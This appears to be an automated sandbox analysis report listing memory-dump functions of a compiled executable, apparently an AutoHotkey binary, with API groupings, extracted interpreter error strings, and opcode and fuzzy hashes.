                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: c68a822d2c0538e7e409a627197b738a8dec189d4ed06749bffbf0d3bf7dfe75
                                                                                                                                                                              • Instruction ID: 77f6842684eef27bee177c0b1538653a41d5c9cd53f982be11e8a040fb4bf793
                                                                                                                                                                              • Opcode Fuzzy Hash: c68a822d2c0538e7e409a627197b738a8dec189d4ed06749bffbf0d3bf7dfe75
                                                                                                                                                                              • Instruction Fuzzy Hash: 3861A076604A8095EB629F26E4843ED73A1F3887E8F514227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: 961fe227c1ad1d6a1d6f97aef67934f7038cf6c1b4949cf4edf5a581203098f8
                                                                                                                                                                              • Instruction ID: b02f33644fe0acc9ebc52f6b55c965ac8702220ca39f72c191a1f38014562640
                                                                                                                                                                              • Opcode Fuzzy Hash: 961fe227c1ad1d6a1d6f97aef67934f7038cf6c1b4949cf4edf5a581203098f8
                                                                                                                                                                              • Instruction Fuzzy Hash: E361B336604A8095EB629F26E4843ED73A1F3887E8F554227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: 34e4b29cd84762cdb4da7f8591f7ad8c69527547529331d90fbc4a4dba2345c8
                                                                                                                                                                              • Instruction ID: 00f162f64a9b1ebcdd1c7dc22a08988207678a7861fd86c2c1a323c4448a0676
                                                                                                                                                                              • Opcode Fuzzy Hash: 34e4b29cd84762cdb4da7f8591f7ad8c69527547529331d90fbc4a4dba2345c8
                                                                                                                                                                              • Instruction Fuzzy Hash: E561B27660468095EB629F26E4843ED73A1F388BE8F514227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: ad26a0d7ee202e7d1107a29aa5cf37b16bc37d7844a7b0120ace989ea18a83d2
                                                                                                                                                                              • Instruction ID: 31d7002fb2f6d1d7f3bdd597d29ef7fcad624c74cf4c8c62e43fe8746aaa3ec5
                                                                                                                                                                              • Opcode Fuzzy Hash: ad26a0d7ee202e7d1107a29aa5cf37b16bc37d7844a7b0120ace989ea18a83d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 4861A13660468095EB629F26E4943ED73A1F3887E8F514227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: c774ab6952abc13e7aaa1f19df1e67b9d59730aa5aa4043a72f1daa241c2cc71
                                                                                                                                                                              • Instruction ID: 50b0ee84789ff58591e564e8d968b6e4e516c419b7274286c9a5b99d8a2a70dd
                                                                                                                                                                              • Opcode Fuzzy Hash: c774ab6952abc13e7aaa1f19df1e67b9d59730aa5aa4043a72f1daa241c2cc71
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F61B336604A8095EB629F26E4843ED73A1F3897E8F514227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: 07466e47bc78411de3cf7f3585ebed1b0872ec13d9ebca15a3ce50b7c05b1dc8
                                                                                                                                                                              • Instruction ID: 35e987b1d5facbce7ee44da8068915c2c2651df770dea58d64d59c998c54a353
                                                                                                                                                                              • Opcode Fuzzy Hash: 07466e47bc78411de3cf7f3585ebed1b0872ec13d9ebca15a3ce50b7c05b1dc8
                                                                                                                                                                              • Instruction Fuzzy Hash: C861C33660468095EB629F26E4943ED73A0F388BE8F550227FB5943AF8DF78C585CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: 35b2b452b0df8881747b2c1f614b890972cb8c9d2cf3e9f381a1d6abb9c43e57
                                                                                                                                                                              • Instruction ID: a83532820a1abfd9b14215fbfb241cf2f854a06cd6e780109c7e8a0ed3e04e3f
                                                                                                                                                                              • Opcode Fuzzy Hash: 35b2b452b0df8881747b2c1f614b890972cb8c9d2cf3e9f381a1d6abb9c43e57
                                                                                                                                                                              • Instruction Fuzzy Hash: 7661C33660468095EB629F26E4943ED73A0F388BE8F550227FB5943AF8DF78C585CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: e1a3217e84934d31b6b1b21d0a9763d87545311faa5bce3864390448fa5fb7ac
                                                                                                                                                                              • Instruction ID: ad2c741b9bc293966b91f4734fc2afad30f90b1132be674504a1a9ccfe384ed1
                                                                                                                                                                              • Opcode Fuzzy Hash: e1a3217e84934d31b6b1b21d0a9763d87545311faa5bce3864390448fa5fb7ac
                                                                                                                                                                              • Instruction Fuzzy Hash: B661C33660468095EB629F26E4943ED73A0F388BE8F550227FB5943AF8DF78C585CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: <>=/|^,:*&~!()[]{}+-?."$"%s" requires at least %d parameter%s.$"%s" requires that parameter #%u be non-blank.$+$Invalid hotkey.$MZ@$Parameter #1 required$Syntax error or too many variables in "For" statement.$This "For" is missing its "in".$This line does not contain a recognized action.$new$]
                                                                                                                                                                              • API String ID: 0-2616766476
                                                                                                                                                                              • Opcode ID: edc8b57694c6b9819aaa9256c1b17bac262cc13fc610e69ad94638e1bc5b5081
                                                                                                                                                                              • Instruction ID: f9ee50731e1e652c43fb86271a4e850f36427dfdbec3113ac8352bcdf9aefd16
                                                                                                                                                                              • Opcode Fuzzy Hash: edc8b57694c6b9819aaa9256c1b17bac262cc13fc610e69ad94638e1bc5b5081
                                                                                                                                                                              • Instruction Fuzzy Hash: DFD2D07260468185EB769F26E4503FD73A1F7987C4F948116FB8A4B6F8EB7AC881D700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$Close$ErrorLastOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 738532287-0
                                                                                                                                                                              • Opcode ID: bcc4337a7efa42d52be63b7a00e3dec8421199196cc070f10d346cdffba38e0e
                                                                                                                                                                              • Instruction ID: dd11adc79eeb87447ffc564bb8a86ff2289d9c31989d0fbae79ad25ed68d3046
                                                                                                                                                                              • Opcode Fuzzy Hash: bcc4337a7efa42d52be63b7a00e3dec8421199196cc070f10d346cdffba38e0e
                                                                                                                                                                              • Instruction Fuzzy Hash: F7C1AE37A04A6086EB62DF26A8447DE27A1F78CBD8F146111FF4A53BB5DB38C984C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: wcsstr
                                                                                                                                                                              • String ID: %s%c%s%cAll Files (*.*)%c*.*%c$::{$All Files (*.*)$C:\Users\user\Desktop$Select File - %s$The maximum number of File Dialogs has been reached.
                                                                                                                                                                              • API String ID: 2735924446-1896893277
                                                                                                                                                                              • Opcode ID: b528a492ae9013fbe6089ab717469ae2131d440885d9509fdd51dc94aa568759
                                                                                                                                                                              • Instruction ID: e9e9a9f5c98fb2ca7d894c309c592d4f66f444cfc533d2c874c1069875eb1187
                                                                                                                                                                              • Opcode Fuzzy Hash: b528a492ae9013fbe6089ab717469ae2131d440885d9509fdd51dc94aa568759
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E32C13221168085EB26DF26E8513E923B0FB997E8F464225FB1A07BF5EF78C645C705
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00000001400A9358: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A9384
                                                                                                                                                                                • Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97
                                                                                                                                                                              • COMRefPtr.MSPDB140-MSVCRT ref: 000000014000C776
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID: Active$Exist$IfWin$MZ@$Nonexistent hotkey variant (IfWin).$Nonexistent hotkey.$Not$Out of memory.$Target label does not exist.$UseErrorLevel
                                                                                                                                                                              • API String ID: 3215553584-2294268042
                                                                                                                                                                              • Opcode ID: f9b41abfc2f45577d60a3089fa3a14c614e55e26e5f37a8a71546d3031df4f19
                                                                                                                                                                              • Instruction ID: 14d24a1a0218d3dcd448695d4d42bd97b77f36e39671d260a56292cd773c8a12
                                                                                                                                                                              • Opcode Fuzzy Hash: f9b41abfc2f45577d60a3089fa3a14c614e55e26e5f37a8a71546d3031df4f19
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A1226B262668081FB63DB27B510BEE2BA0A75D7D8F089205FF95076F2DB38C585D311
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$Close$Enum$ClipboardGlobalInfoMessageOpenPeekQueryValueWire
                                                                                                                                                                              • String ID: %s%s%s$MZ@
                                                                                                                                                                              • API String ID: 3874374163-1733240152
                                                                                                                                                                              • Opcode ID: 12a48660fd565cca727367cda2d1aad1f4a5ce79aab8c79fcc192203273ae2e8
                                                                                                                                                                              • Instruction ID: 7b8221f5117245229100a62bba1646fda72faab8a4ea5445045a4e2adc1d7622
                                                                                                                                                                              • Opcode Fuzzy Hash: 12a48660fd565cca727367cda2d1aad1f4a5ce79aab8c79fcc192203273ae2e8
                                                                                                                                                                              • Instruction Fuzzy Hash: AEF13F72604B9489EB62CF66E8803DE77A4F78CBD8F144216EB8D47BA8DB38C545C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CastDynamic
                                                                                                                                                                              • String ID: %s.%.*s := %.*s, $Declaration too long.$Duplicate declaration.$Invalid class variable declaration.$Out of memory.$Unknown class var.$__Init$base.__Init()$this
                                                                                                                                                                              • API String ID: 3796249952-2290300046
                                                                                                                                                                              • Opcode ID: dc8f9e0170c1b5e69760dd38f3aeb971701d8ded019d5123573d5df8acaff1f1
                                                                                                                                                                              • Instruction ID: 2e82765cff8d73656303cf0960e1f2cc566a9c8602f3b50827be4b942719194d
                                                                                                                                                                              • Opcode Fuzzy Hash: dc8f9e0170c1b5e69760dd38f3aeb971701d8ded019d5123573d5df8acaff1f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 90E16972604B8485EB629F26E4407EA77A4F74CBC4F44811AFF8907BA5EF78C891D742
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$Error text not found (please report)$LF)$MZ@$NO_START_OPT)$UCP)$UTF16)$no error
                                                                                                                                                                              • API String ID: 0-1038885284
                                                                                                                                                                              • Opcode ID: da5991f8b016925b7e72fa3bd6a636af43c6fc3f69c98d361f9f7540ebebff4b
                                                                                                                                                                              • Instruction ID: f4f6503808f73611ecbc3f7e08c22f90bb7568f568aef60f58066e59f1cd9b62
                                                                                                                                                                              • Opcode Fuzzy Hash: da5991f8b016925b7e72fa3bd6a636af43c6fc3f69c98d361f9f7540ebebff4b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1C82E072A10B90CAEB268F26E4407EE77B4F7587D8F514216FB59877A4EB38C954C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
